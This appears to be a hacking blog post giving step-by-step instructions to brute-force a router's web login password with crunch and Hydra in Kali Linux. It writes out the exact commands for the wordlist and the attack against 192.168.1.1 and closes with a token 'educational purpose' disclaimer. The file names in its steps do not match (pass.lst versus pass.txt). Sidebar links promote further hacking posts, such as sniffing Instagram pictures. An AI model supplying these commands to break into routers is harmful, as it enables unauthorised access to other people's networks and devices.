Skip to main content

How to hack wifi router password (step by step)

Hack a router login password in Kali Linux using Hydra tool.

What is Hydra?

Hydra is a password cracking tool which can support many different services.
As a password cracking tool- Hydra has been tested on the following Protocols:

afp cisco cisco-enable cvs
firebird ftp http-get http-head
http-proxy https-get https-head https-form-get
https-form-post icq imap imap-ntlm
ldap2 ldap3 mssql mysql
ncp nntp oracle-listener pcanywhere
pcnfs pop3 pop3-ntlm postgres
rexec rlogin rsh sapr3
sip smb smbnt smtp-auth
smtp-auth-ntlm snmp socks5 ssh2
teamspeak telnet vmauthd vnc

How to hack router login in Kali Linux

Step1: Make a password list and save it as pass.lst or pass.txt using cruch.
Open a terminal and type "crunch 3 4 01234567891abcd -o /root/Desktop/pass.lst.

Step2: Now start hydra by typing this command:
"hydra -s 80 -l admin -P /root/Desktop/pass.txt 192.168.1.1 http-get".
Hit Enter.

Now wait until you will receive the password.

Try it by yourself.

WARNING: This tutorial is just for Educational purpose. We will not be responsible for any Illegal use.

Comments

Popular posts from this blog

How to hack (sniff) Instagram pictures using SSLstrip in Kali Linux

Is Marianas Web A Myth Or A Frightening Reality?

If you’ve been on the Internet for a long time, chances are that you’d be inclined to say you’ve seen it all. Well, let’s just say that you haven’t really seen it all until you’ve seen Marianas Web. Don’t get your keyboard and mouse ready just yet, though – that might prove a bit more difficult than you think. This is because it doesn’t even exist. … Or does it? The Internet Is Like An Onion Just like ogres, the Internet is like an onion: it has many layers. At first glance, conducting a basic Google search and seeing about 168,000,000 distinct results show up is pretty freaking overwhelming. Can you really imagine hundreds of millions of results for ONE keyword alone? In that regard, we suppose, the Internet has grown to be about as vast as the universe itself. Just like there are billions upon trillions of stars, there are billions upon trillions of web pages. However, at the end of the day, the Internet is classified as finite. Because of this, there’s this infamous hierarchy...

How to download and install Netattack2 tool in Kali Linux.